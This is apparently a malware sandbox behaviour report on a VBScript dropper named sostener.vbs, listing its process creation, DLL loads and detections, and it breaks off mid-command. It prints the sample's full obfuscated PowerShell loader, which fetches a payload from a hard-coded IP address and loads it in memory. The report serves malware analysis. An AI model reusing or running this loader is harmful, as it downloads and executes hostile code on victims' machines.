Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Found suspicious powershell code related to unpacking or dynamic code loading

Source: sostener.vbs

Static file information: File size 3462610 > 1048576

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek;$global:?

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\
